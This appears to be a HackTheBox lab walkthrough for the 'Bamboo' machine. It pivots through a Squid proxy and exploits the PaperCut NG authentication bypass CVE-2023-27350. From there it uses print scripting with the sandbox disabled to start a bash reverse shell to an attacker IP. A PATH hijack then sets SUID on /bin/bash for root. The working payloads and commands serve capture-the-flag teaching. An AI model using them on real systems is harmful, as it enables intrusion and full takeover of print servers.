Summary
Bamboo is a Hackthebox machine that chains together a Squid proxy pivot, an authentication bypass in PaperCut NG (CVE-2023-27350), and a PATH hijack privilege escalation to reach root. The exposed Squid proxy on port 3128 acts as a gateway into internal services. Using the proxy to reach PaperCut NG on port 9191, an attacker abuses the SetupCompleted authentication bypass to gain admin access without credentials. From there, PaperCut's built-in scripting engine is weaponized to obtain a reverse shell. On the box, the PaperCut server binary directory sits in the system PATH and is writable by the papercut user. A root-owned process periodically invokes a script from that directory — replacing it with a malicious payload drops a SUID bit on /bin/bash and hands over root.
Reconnaissance
Port Scan
nmap -sC -sV -A <MACHINE-IP> -oA nmap
Open ports:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 8.9p1 (Ubuntu) |
| 3128 | HTTP Proxy | Squid 5.9 |
No direct web application was exposed. Port 3128 is a Squid HTTP proxy — browsing to it directly returns an error. This means there are likely internal services only reachable through the proxy.
Pivoting Through the Squid Proxy
Discovering Internal Services with spose
spose is a port scanner that works through Squid proxies.
git clone https://github.com/aancw/spose
cd spose
python3 spose.py --proxy http://<MACHINE-IP>:3128 --target localhost --allports
Results:
localhost:22 seems OPEN
localhost:9191 seems OPEN
localhost:9192 seems OPEN
localhost:9195 seems OPEN
Port 9191 is the default PaperCut NG application port.
Configuring ProxyChains
Add the following line to /etc/proxychains4.conf:
http <MACHINE-IP> 3128
Verify the internal service is reachable:
proxychains curl http://127.0.0.1:9191 -v
Output (truncated):
[proxychains] Dynamic chain ... <MACHINE-IP>:3128 ... 127.0.0.1:9191 ... OK
< HTTP/1.1 302 Found
< Location: http://127.0.0.1:9191/user
The redirect confirms a web application is running at /user.
Configuring Burp Suite as Upstream Proxy
To browse via the browser through the Squid proxy:
- Open Burp Suite → Settings → Network → Connections
- Under Upstream proxy servers, click Add
- Set:
- Destination host:
* - Proxy host:
<MACHINE-IP> - Proxy port:
3128
- Destination host:
- Configure Firefox to use Burp as proxy (
127.0.0.1:8080)
Now browsing to http://127.0.0.1:9191/user in the browser loads:
PaperCut NG 22.0 login page.
Initial Access
CVE-2023-27350 — PaperCut NG Authentication Bypass
PaperCut NG 22.0 is vulnerable to an authentication bypass via the SetupCompleted Java class. The setup completion page contains a Login button that submits an HTTP request granting a valid admin session without checking credentials. This is CVE-2023-27350 (CVSS 9.8).
Reference blog: https://community.hpe.com/t5/hpe-threat-labs/cve-2023-27350-papercut-ng-and-mf-remote-code-execution/ba-p/7266278
Step 1 — Access the setup completion page:
http://127.0.0.1:9191/app?service=page/SetupCompleted
Click Login. The application redirects to the admin Dashboard at:
http://127.0.0.1:9191/app?service=page/Dashboard
No credentials needed — we are now authenticated as admin.
Enabling Scripting (Pre-RCE Step)
Navigate to Options → Config Editor and search for script. Two values must be changed:
| Key | Old Value | New Value |
|---|---|---|
print-and-device.script.enabled |
N |
Y |
print.script.sandboxed |
Y |
N |
Click Update on each. The page confirms "Successfully updated key value."
Remote Code Execution via Print Scripting
Step 1 - Find the printer:
Navigate to Printers → Printer List. There is one printer: [Template printer]. Click it, then go to the Scripting tab.
Step 2 - Test RCE with a ping:
Check the Enable print script checkbox and replace the default script with:
function printJobHook(inputs, actions) {
// your script here
}
java.lang.Runtime.getRuntime().exec('ping <YOUR-IP>');
Click Apply. On the attacker machine:
tcpdump -ni tun0 icmp
Output:
13:45:58.153109 IP <MACHINE-IP> > <YOUR-IP>: ICMP echo request, id 1, seq 1, length 64
13:45:58.153301 IP <YOUR-IP> > <MACHINE-IP>: ICMP echo reply, id 1, seq 1, length 64
Code execution confirmed.
Step 3 - Reverse shell:
Start a listener:
nc -lvnp 4444
Update the print script:
function printJobHook(inputs, actions) {
// your script here
}
java.lang.Runtime.getRuntime().exec(['/bin/bash', '-c', 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1']);
Click Apply. Shell received:
$ whoami
papercut
papercut@bamboo:~/server$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
User flag:
papercut@bamboo:~$ cat /home/papercut/user.txt
[REDACTED]
Post-Exploitation Enumeration
Home Directory
papercut@bamboo:~$ ls -la
drwxr-xr-x 8 papercut papercut 4096 Sep 30 2025 .
-rw-r--r-- 1 papercut papercut 102 Sep 29 2022 .install-config
drwxr-xr-x 5 papercut papercut 4096 May 26 2023 client
drwxr-xr-x 13 papercut papercut 4096 May 26 2023 server
-rw-r----- 1 root papercut 33 Jun 20 06:07 user.txt
Checking server.properties
papercut@bamboo:~/server$ cat server.properties | grep password
admin.password=HASH\:$2a$10$I9n7kuIU2a0ODXhCfc3Z4e0h4G69KaFgDdksemRoNGrQf2Hu.4Xvm
database.password=
The admin password hash is bcrypt — not practically crackable.
SUID Binaries
find / -perm -4000 2>/dev/null | grep -Ev '^/snap'
Notably:
/home/papercut/server/bin/linux-x64/authpam
file authpam
# authpam: setuid executable, regular file, no read permission
Not directly exploitable, but the directory is interesting.
Privilege Escalation — PATH Hijacking
Identifying the Writable PATH Entry
Running linpeas.sh revealed:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/home/papercut/server/bin/linux-x64
The directory /home/papercut/server/bin/linux-x64 is in the system PATH and is owned by papercut:
ls -ld /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4096 May 26 2023 /home/papercut/server/bin/linux-x64/
Finding the Trigger with pspy64
Upload and run pspy64 to monitor processes:
wget http://<YOUR-IP>/pspy64
chmod +x pspy64
./pspy64
In the browser, navigate to Enable Printing → Print Deploy. Click Zones → Import BYOD-friendly print queues → Next → Start importing mobility printers. Then click Refresh servers.
pspy64 captures:
CMD: UID=0 PID=119891 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
CMD: UID=0 PID=119897 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
Root (UID=0) is executing /home/papercut/server/bin/linux-x64/server-command - a script in our writable directory. Every time the Refresh servers button is clicked in the Print Deploy page, this execution is triggered.
Exploiting the PATH Hijack
Replace server-command with a malicious script:
cd /home/papercut/server/bin/linux-x64/
echo 'chmod u+s /bin/bash' > server-command
chmod +x server-command
Go back to the browser and click Refresh servers. pspy64 confirms execution:
CMD: UID=0 PID=121468 | chmod u+s /bin/bash
Verify:
ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 2024 /bin/bash
Root Shell
papercut@bamboo:/tmp$ bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
[REDACTED]
Attack Chain
Squid proxy on port 3128 → pivot to internal services
│
▼
Port scan via spose → localhost:9191 (PaperCut NG 22.0) open
│
▼
CVE-2023-27350 → /app?service=page/SetupCompleted → auth bypass → admin dashboard
│
▼
Disable sandbox + enable scripting via Config Editor
│
▼
Printer scripting tab → Java Runtime exec() → reverse shell as papercut
│
▼
linpeas / pspy64 → writable PATH dir /home/papercut/server/bin/linux-x64/
│
▼
Root process invokes server-command via PATH → replace with malicious script
│
▼
Click "Refresh servers" in Print Deploy → chmod u+s /bin/bash
│
▼
bash -p → root
Key Vulnerabilities
| # | Vulnerability | Impact |
|---|---|---|
| 1 | Squid proxy exposing internal services — Port 3128 accessible externally with no restrictions | Provides tunnel into otherwise unreachable internal services |
| 2 |
CVE-2023-27350 — PaperCut NG auth bypass — SetupCompleted class allows login without credentials |
Full unauthenticated admin access to PaperCut |
| 3 | PaperCut scripting with disabled sandbox — Admin can enable print scripting and disable the sandbox | Direct OS command execution as the papercut service user |
| 4 |
Writable directory in system PATH — /home/papercut/server/bin/linux-x64/ owned by unprivileged user but in PATH |
File placement for PATH hijacking |
| 5 |
Root process executing PATH-resolved binary — server-command called by UID=0 via relative PATH |
Malicious script replacement leads to SUID bash and full root access |
Machine: Bamboo | Platform: HackTheBox | Difficulty: Easy–Medium
Top comments (0)